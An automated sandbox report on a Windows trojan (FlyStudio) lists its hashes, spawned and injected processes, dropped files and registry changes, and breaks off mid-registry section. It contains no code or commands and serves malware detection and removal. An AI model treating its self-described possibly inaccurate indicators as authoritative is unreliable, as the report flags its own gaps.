Trojan.Win32.FlyStudio_4937d0d8c1

by malwarelabrobot on June 15th, 2014 in Malware Descriptions.

HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Trojan.Agent.BDJT (B) (Emsisoft), Trojan.Agent.BDJT (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.Alureon.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 4937d0d8c199fab565657944560f67d1
SHA1: 5737a160ebc28f0bf83d2c4fa4accc59893a551c
SHA256: af3654e6a7ce82418e14b8d42487da9c09329eca7c5cf022bbcfa1e89f7967fb
SSDeep: 12288:M8cXSrqphitkdebZlqe8a 4pQGZjLfPtaXQsFhKF:M8cXSMit1bCQrjTlaA
Size: 494592 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company: no certificate found
Created at: 2014-06-07 06:12:39
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

Wuji.exe:568
FhCalendar.exe:452
wujiime.exe:464
MSIB.tmp:916
xxdd_165.exe:452
updroots.exe:1016
114gglm_016.exe:488
Update.exe:444
fhrl_6_12001.exe:320
fhsli_6_12001.exe:1852
netsh.exe:436
netsh.exe:628
SportLive.exe:908
MsiExec.exe:1760
oemfhsli.exe:628

The Trojan injects its code into the following process(es):

FhCalendar.exe:588
%original file name%.exe:1832

File activity

The process FhCalendar.exe:588 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\fixad[1].htm (1737 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetHoliday[1].ashx (876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\SendClickData[1].ashx (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\picchange[1].css (584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\sogou_icon_short[1].png (1421 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (977 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\qi[1].htm (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\picchange[1].js (908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[1].js (376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\82ea18df-b4ae-4b17-b1ab-46cba4b98343[1].jpg (19946 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\CAH4OJPH.htm (2844 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (1403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (330 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\pixel[1].htm (6 bytes)
%Program Files%\fhrl\note.ini (991 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\CAQJWRVK.htm (1684 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\924aed3e-a026-4cc3-996e-72927d75dda5[1].jpg (7278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\jquery-1.3.2.min[1].js (36827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\qi[1].htm (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetWeather[1].ashx (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[2].js (421 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\qi[2].htm (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\CAKPO1SZ.htm (3738 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\48aaf3d6-f95f-4921-8a68-2606aed69a12[1].jpg (13306 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetWeather[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\c[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetHoliday[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\SendClickData[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (0 bytes)

The process wujiime.exe:464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Wuji\Wuji.exe (7209 bytes)
%Program Files%\Wuji\update.exe (7451 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\无极输入法.lnk (638 bytes)
%Program Files%\Wuji\Wuji.dat (1945 bytes)
%Program Files%\Wuji\uninst.exe (3685 bytes)
%Documents and Settings%\%current user%\Desktop\无极输入法.lnk (626 bytes)
%Program Files%\Wuji\Wuji.dll (2422 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\卸载无极输入法.lnk (479 bytes)
%System%\catsrvuz.dll (53 bytes)
%Program Files%\Wuji\Show.dat (5 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Desktop\无极输入法.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nssD.tmp (0 bytes)
%Program Files%\Wuji\Wuji.dll (0 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\无极输入法\卸载无极输入法.lnk (0 bytes)

The process xxdd_165.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\xxdd\Liveconfig.ini (22 bytes)
%Program Files%\xxdd\xxdd.msi (146581 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsr4.tmp (0 bytes)

The process 114gglm_016.exe:488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\wujiime.exe (2105 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsrC.tmp (0 bytes)

The process Update.exe:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\version[1].txt (72 bytes)
%Program Files%\fhrl\Update.log (402 bytes)
%Program Files%\fhrl\fhUp\Update\version.ini (72 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\version[1].txt (0 bytes)

The process fhrl_6_12001.exe:320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\fhrl\Skin\test\btn_push.png (263 bytes)
%Program Files%\fhrl\Skin\test\clock_bk.png (2 bytes)
%Program Files%\fhrl\Skin\test\²Ëµ¥bk.png (1 bytes)
%Program Files%\fhrl\Skin\test\È·ÈÏ°´Å¥2̬.png (1 bytes)
%Program Files%\fhrl\Skin\test\ÀͶ¯½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\closetip_hov.png (4 bytes)
%Program Files%\fhrl\Skin\test\xpopweb.xml (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_del_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\xhlwnd.xml (2 bytes)
%Program Files%\fhrl\Skin\test\¹úÇì½Ú.png (508 bytes)
%Program Files%\fhrl\Skin\test\equal_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\city_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_hover.png (792 bytes)
%Program Files%\fhrl\Skin\test\finish_push.png (417 bytes)
%Program Files%\fhrl\Skin\test\mini_bk.png (14 bytes)
%Program Files%\fhrl\Skin\test\go_hov.png (2 bytes)
%Program Files%\fhrl\Fhuninstall.exe (9178 bytes)
%Program Files%\fhrl\Skin\test\½Ìʦ½Ú.png (545 bytes)
%Program Files%\fhrl\Skin\test\ca_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\ÆßϦ½Ú.png (930 bytes)
%Program Files%\fhrl\Skin\test\go_nor.png (2 bytes)
%Program Files%\fhrl\FMTest.exe (14713 bytes)
%Program Files%\fhrl\huangli.xml (6456 bytes)
%Program Files%\fhrl\Skin\test\finish_hov.png (413 bytes)
%Program Files%\fhrl\Skin\test\shop_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\closetip_push.png (4 bytes)
%Program Files%\fhrl\Skin\test\input.png (3 bytes)
%Program Files%\fhrl\Skin\test\back_push.png (2 bytes)
%Program Files%\fhrl\Update.exe (17508 bytes)
%Program Files%\fhrl\Skin\test\btn_mini_down.png (279 bytes)
%Program Files%\fhrl\KillProc.exe (4255 bytes)
%Program Files%\fhrl\Skin\test\calendar.png (7 bytes)
%Program Files%\fhrl\Skin\test\day_hov.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_uninstall.png (1392 bytes)
%Program Files%\fhrl\Skin\test\setting_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\clocknote_list_item.xml (3 bytes)
%Program Files%\fhrl\Skin\test\¼Ù.png (1 bytes)
%Program Files%\fhrl\Skin\test\edit_nor.png (431 bytes)
%Program Files%\fhrl\Skin\test\button_B_hover.png (613 bytes)
%Program Files%\fhrl\Skin\test\clock_nor.png (2 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\·çºÍÈÕÀú\·çºÍÈÕÀú.lnk (686 bytes)
%Program Files%\fhrl\uninst.exe (738 bytes)
%Program Files%\fhrl\Skin\test\ÖÐÇï½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\shop_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\Combo_over.bmp (3 bytes)
%Program Files%\fhrl\Skin\test\xfhnotetip.xml (1 bytes)
%Program Files%\fhrl\FMDLL32.dll (14324 bytes)
%Program Files%\fhrl\Skin\test\look_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\menu.xml (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_process.png (3 bytes)
%Program Files%\fhrl\Skin\test\jia_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\Refresh_hover.png (1 bytes)
%Program Files%\fhrl\Skin\test\clock_sel.png (2 bytes)
%Program Files%\fhrl\Skin\test\tip_bk.png (2 bytes)
%Program Files%\fhrl\Skin\test\equal_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\³ýϦ.png (1 bytes)
%Program Files%\fhrl\Skin\test\setting_hov.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_back.png (1 bytes)
%Program Files%\fhrl\Skin\warn.wav (314 bytes)
%Program Files%\fhrl\subdivis.db (4 bytes)
%Program Files%\fhrl\Skin\test\shop_sel.png (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_show.png (3 bytes)
%Program Files%\fhrl\Update\version.ini (72 bytes)
%Program Files%\fhrl\Skin\test\btn_mini_normal.png (1578 bytes)
%Program Files%\fhrl\Skin\test\xminiweb.xml (2 bytes)
%Program Files%\fhrl\Skin\test\js_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\clock_del_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\look_nor.png (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\index_1.png (2 bytes)
%Program Files%\fhrl\Skin\Default\foembin.exe (12158 bytes)
%Program Files%\fhrl\Skin\test\button_normal.png (676 bytes)
%Program Files%\fhrl\Skin\test\xiala_1.png (1 bytes)
%Program Files%\fhrl\Skin\test\Ôªµ©.png (2 bytes)
%Program Files%\fhrl\Skin\test\btn_hot.png (1228 bytes)
%Program Files%\fhrl\FhCalendar.exe (19232 bytes)
%Program Files%\fhrl\Skin\Default\Skin.ini (1 bytes)
%Program Files%\fhrl\Skin\test\Ê¥µ®½Ú.png (873 bytes)
%Program Files%\fhrl\Skin\test\js_sel.png (1 bytes)
%Program Files%\fhrl\Skin\test\index.png (2 bytes)
%Program Files%\fhrl\Skin\test\btn_close_highlight.png (475 bytes)
%Program Files%\fhrl\Skin\test\ca_nor.png (2 bytes)
%Program Files%\fhrl\Skin\Default\unist_btn_next.png (1350 bytes)
%Program Files%\fhrl\Skin\test\¸Ð¶÷½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\¹í½Ú.png (913 bytes)
%Program Files%\fhrl\Skin\test\¼ÙÑ¡ÖÐ.PNG (3 bytes)
%Program Files%\fhrl\Skin\test\xbasicsetting.xml (4 bytes)
%Program Files%\fhrl\Skin\test\tip.png (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_del_hov.png (1 bytes)
%Program Files%\fhrl\FMDLL.dll (14673 bytes)
%Program Files%\fhrl\Skin\test\close_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\xiala_3.png (1 bytes)
%Program Files%\fhrl\DuiLib_u.dll (10572 bytes)
%Program Files%\fhrl\Skin\test\day_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\xfh.xml (1568 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\·çºÍÈÕÀú.lnk (692 bytes)
%Program Files%\fhrl\Skin\test\scrollbar.bmp (1568 bytes)
%Program Files%\fhrl\Skin\test\´º½Ú.png (1 bytes)
%Documents and Settings%\All Users\Desktop\·çºÍÈÕÀú.lnk (674 bytes)
%Program Files%\fhrl\Skin\test\dian.png (290 bytes)
%Program Files%\fhrl\Skin\test\clock_del_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\back_nor.png (2 bytes)
%Program Files%\fhrl\Skin\test\S_22.png (1 bytes)
%Program Files%\fhrl\Skin\test\ÖØÑô½Ú.png (2 bytes)
%Program Files%\fhrl\Skin\Default\Controls.ini (285 bytes)
%Program Files%\fhrl\Skin\Default\bin.ini (1 bytes)
%Program Files%\fhrl\Skin\test\¶ËÎç½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\delapp1.png (1 bytes)
%Program Files%\fhrl\Skin\test\close_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\del_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\new_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\logo.png (4 bytes)
%Program Files%\fhrl\Skin\test\Festival.xml (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_pic_top.png (1568 bytes)
%Program Files%\fhrl\Skin\test\back_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\ÇåÃ÷½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\js_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\equal_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\¸¾Å®½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\¸¸Ç×½Ú.png (846 bytes)
%Program Files%\fhrl\Skin\test\edit_push.png (432 bytes)
%Program Files%\fhrl\Skin\test\¶ùͯ½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_down.png (784 bytes)
%Program Files%\fhrl\Skin\test\delapp.png (3 bytes)
%Program Files%\fhrl\Skin\test\clock_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\btn_close_normal.png (1682 bytes)
%Program Files%\fhrl\Skin\test\ÓÞÈ˽Ú.png (991 bytes)
%Program Files%\fhrl\Skin\test\go_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\lunar.png (2 bytes)
%Program Files%\fhrl\Skin\test\°àÑ¡ÖÐ.PNG (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup\·çºÍÈÕÀú.lnk (686 bytes)
%Program Files%\fhrl\Skin\test\new_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\day_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\js_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\logo_16icon.png (3 bytes)
%Program Files%\fhrl\Skin\test\bg10.png (1568 bytes)
%Program Files%\fhrl\Skin\test\ĬÈÏ.png (1 bytes)
%Program Files%\fhrl\Skin\test\tip_content_bk.png (3 bytes)
%Program Files%\fhrl\Skin\Default\line.png (2 bytes)
%Program Files%\fhrl\Skin\test\scrollbar.png (1 bytes)
%Program Files%\fhrl\Skin\test\shop_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\city_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_B_pushed.png (605 bytes)
%Program Files%\fhrl\Skin\test\logo_mini.png (1 bytes)
%Program Files%\fhrl\Skin\test\app_bk.png (2 bytes)
%Program Files%\fhrl\Skin\test\menu_bk.png (3 bytes)
%Program Files%\fhrl\Skin\test\jia_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\ÔªÏü½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\scrollbar_o.png (1975 bytes)
%Program Files%\fhrl\Skin\test\jsq_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\del_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\ƽ°²Ò¹.png (1 bytes)
%Program Files%\fhrl\Skin\test\finish_nor.png (425 bytes)
%Program Files%\fhrl\Skin\test\ca_sel.png (2 bytes)
%Program Files%\fhrl\Skin\test\jsq_res.png (3 bytes)
%Program Files%\fhrl\Skin\test\ĬÈÏÑ¡ÖÐ.png (2 bytes)
%Program Files%\fhrl\Skin\test\jintian3.png (3 bytes)
%Program Files%\fhrl\Skin\test\layerClo.png (1 bytes)
%Program Files%\fhrl\Skin\Default\btn_radio.png (1 bytes)
%Program Files%\fhrl\Skin\test\È·ÈÏ°´Å¥³£Ì¬.png (1 bytes)
%Program Files%\fhrl\Skin\test\button_B_normal.png (474 bytes)
%Program Files%\fhrl\Skin\test\setting_push.png (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\·çºÍÈÕÀú\жÔØ·çºÍÈÕÀú.lnk (691 bytes)
%Program Files%\fhrl\Skin\test\clock_del_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\chat_mid_bk.png (1308 bytes)
%Program Files%\fhrl\Skin\test\closetip_nor.png (4 bytes)
%Program Files%\fhrl\Skin\test\clock_note_setting.xml (8 bytes)
%Program Files%\fhrl\Skin\test\Refresh_pushed.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_cancel.png (890 bytes)
%Program Files%\fhrl\Skin\test\ĸÇ×½Ú.png (1 bytes)
%Program Files%\fhrl\Skin\test\S_11.png (1 bytes)
%Program Files%\fhrl\Skin\test\look_hov.png (2 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_close.png (2 bytes)
%Program Files%\fhrl\Skin\test\bord_bk.png (3 bytes)
%Program Files%\fhrl\Skin\test\Combo_nor.bmp (3 bytes)
%Program Files%\fhrl\Skin\test\btn_mini_highlight.png (1440 bytes)
%Program Files%\fhrl\Skin\test\btn_close_down.png (1098 bytes)
%Program Files%\fhrl\Skin\test\°à.png (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_hov.png (1 bytes)
%Program Files%\fhrl\Skin\test\close_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\ÇéÈ˽Ú.png (1 bytes)
%Program Files%\fhrl\Skin\Default\uninst_btn_check.png (3 bytes)
%Program Files%\fhrl\Skin\test\edit_hov.png (429 bytes)
%Program Files%\fhrl\Skin\test\clock_push.png (2 bytes)
%Program Files%\fhrl\Skin\test\¹â¹÷½Ú.png (536 bytes)
%Program Files%\fhrl\Skin\test\Refresh_normal.png (1 bytes)
%Program Files%\fhrl\Skin\test\jsq_del_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\xiala_2.png (1 bytes)
%Program Files%\fhrl\Skin\test\del_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\jia_push.png (1 bytes)
%Program Files%\fhrl\Skin\test\ca_hov.png (2 bytes)
%Program Files%\fhrl\Skin\test\new_nor.png (1 bytes)
%Program Files%\fhrl\Skin\test\weather_bk.png (15 bytes)
%Program Files%\fhrl\Skin\test\friend_list_item.xml (2 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp (0 bytes)

The process fhsli_6_12001.exe:1852 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\System.dll (10 bytes)
%Program Files%\Common Files\Install\fhrlsli\info.ini (996 bytes)
%Program Files%\Common Files\Install\fhrlsli\oemfhsli.exe (17882 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\System.dll (0 bytes)

The process SportLive.exe:908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\lb[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\iau[1].htm (1 bytes)
%Program Files%\xxss.ini (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\core[1].php (800 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\z_stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\ad_sport[1].jpg (12251 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (163 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\addetail[1].html (308 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\ad[1].htm (519 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (168 bytes)
%Program Files%\TogouInputin\Togoupplib.dat (2095 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\jquery-1.9.1.min[1].js (55677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\type[1].js (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\event[1].css (554 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (203 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\addetail[1].htm (413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\W1YHYF09\center-titlebg[1].png (948 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AVSTIBOT\event[1].htm (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\MRYNK3CL\common[1].js (73 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (214 bytes)

The process %original file name%.exe:1832 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\fhsli_6_12001.exe (1616 bytes)
C:\114gglm_016.exe (1664 bytes)
C:\xxdd_165.exe (30622 bytes)

The process oemfhsli.exe:628 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (330 bytes)
%Documents and Settings%\All Users\Documents\fhrl_6_12001.exe (13084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\info[1].ini (997 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\Setup[1].ashx (38 bytes)
%Program Files%\Common Files\Install\fhrlsli\info.ini (997 bytes)
%Program Files%\fhrl\info.db (120 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\Setup[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\GetConfig[1].ashx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O7QLUV4N\info[1].ini (0 bytes)

Registry activity

The process Wuji.exe:568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKCU\Software\VB and VBA Program Settings\fzl\2013]
"zc1" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCU\Software\VB and VBA Program Settings\fzl\2013]
"zc4" = "1"
"zc5" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
